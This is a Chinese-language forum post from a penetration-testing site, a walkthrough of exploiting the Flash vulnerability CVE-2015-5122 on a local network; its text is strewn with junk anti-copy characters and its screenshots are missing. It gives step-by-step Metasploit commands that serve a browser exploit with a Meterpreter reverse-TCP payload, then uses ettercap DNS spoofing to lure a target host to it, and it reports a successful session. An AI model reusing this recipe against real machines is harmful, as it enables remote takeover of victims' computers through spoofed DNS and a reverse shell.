中国网络渗透测试联盟

标题: cve2015-5122漏洞实例演示虚拟机 [打印本页]

作者: admin    时间: 2018-10-20 20:28
标题: cve2015-5122漏洞实例演示虚拟机

9 L& H9 S) z" C- y" L3 H3 e) x 二、cve2015-5122漏洞实例演示虚拟机 $ B' Q9 u/ r2 r2 [6 [

0 v6 `) K& z: S+ y& O

& q6 e1 Y6 |& f5 ?3 R2 X2 G8 e   关于cve2015-5122这个漏洞,大家可以百度一下,是关于flash的漏洞,是2015flash漏洞的第二发,今天我们就用这个漏洞来演示,开启kai linux msfconsole命令启动msf如图: 2 F @0 |3 k4 i

& f( d5 C. L% s( e4 j& q

% J; a |2 {' x search cve-2015-5122如图: ! g; Y7 i |, ?' S5 |+ t: X

7 d5 |; O2 ~( L7 p) H5 i8 J

# v: |5 _ ^3 M& A1 v$ c   ( q, J$ d* V% x. q

5 |% o/ L8 m# E

0 [( f* h* m/ I! u" ~6 D; d( u 下面我们敲如下命令: % V& k! v. r9 Z1 A4 k! P

6 h/ d- O D" {, d9 ~4 x! U4 f

, ^* `" d) f! w G# h) \& b use exploit/multi/browser/adobe_flash_opaque_background_uaf / `( h8 n# P4 t1 d/ r

1 ]7 c$ _1 K6 j4 t; v( H5 s8 k

( a. k; o0 G9 j( w set PAYLOAD windows/meterpreter/reverse_tcp ; i2 D/ G6 R: }; }2 e |

. Y" {# x) K; H

4 D8 R4 y% o( D- D set LHOST 192.168.0.109 3 V' K% }- g# t5 N6 ^8 g- F

8 S, U4 C* M' m3 l9 q: _

. y" R! s# O4 w$ B( K set URIPATH /                        /*根目录*/ . c* W# \& E2 g$ H. v5 x

! Z% l i' O+ M

9 c% T7 c! b& W3 ] set SRVHOST 192.168.0.109  //192.168.0.109kaili ip地址 0 W. E6 C& ~- S2 H0 Q) V N

# |/ n$ J w# a, ^

& w8 P6 x+ J. t! j5 {0 ? set SRVPORT 80            /*80端口*/ 使用80端口时要保证apache为停止状态用service apache2 stop命令停止否则会提示端口被占用 * d& C! {, {5 [; V

2 b8 h% j" X" A# K6 x# H! |

- n3 B/ X! i, b* N, j 然后show options如图: : {% [) \; a+ ^

! O7 d j5 s( w0 \

* v% m( {, b' g! t7 o: ]   ) f7 R& l- P( Y3 G

, j$ A4 g2 C( W+ |9 @

& _. X% c. w" G4 d. p 一切都设置好了,执行exploit下面我们进etc/ettercap目录下设置etc.dns如图:
! y# o" T7 k8 x$ _! o
# B+ ]& L8 d. t" l# {

2 x6 n6 a, [/ `" K3 Z

+ L0 k7 N0 q* t- l6 R 然后ettercap -G命令打开ettercap,我们要攻击的主机ip192.168.0115 ! H, y/ h% x- `# x4 ]

7 z4 F, t" `+ N& p1 P4 ~# e# R

2 @4 J, `: N5 o* I i Ettercap过程第一篇里已经演示,这里不在详细写了。。。执行完ettercap以后我们观察一下msf ' H0 L6 {. u- d8 f- }

) m: h4 E+ Y; u( j3 `0 n: R

, X, e( K0 H, f1 a$ H0 ~+ O   - {+ r+ F5 f) [( i- V4 E

9 K7 ]1 g/ U! K4 b& z* j _7 b

. {3 q1 ? j% x5 c 成功了,这时候我们断开ettercap,如图: % u7 }9 L0 h6 h; ^: L: C

$ Q" d3 g+ O* p4 c3 Y& z. r3 _

; M. n3 Y: f; N   7 z3 ?7 c. g' B0 y+ H

- _* s# H* Q* e1 l3 ?: r ^2 l( J e

- }+ p- t3 o! ^7 }- B Screenshot如图: / m9 a$ g% |- L6 a; I; o. r: i

6 F/ s4 F; V+ `1 a+ Y7 h

" U1 ?. g7 n2 C% ^1 [# Y2 ^% R   6 I* c% w: s* d: z q

) d8 n1 G! z' n# G" S6 C/ K4 n

) l6 t8 j3 ]% }5 Y 6 F7 d1 i0 b1 y- p" A/ C$ ~






欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2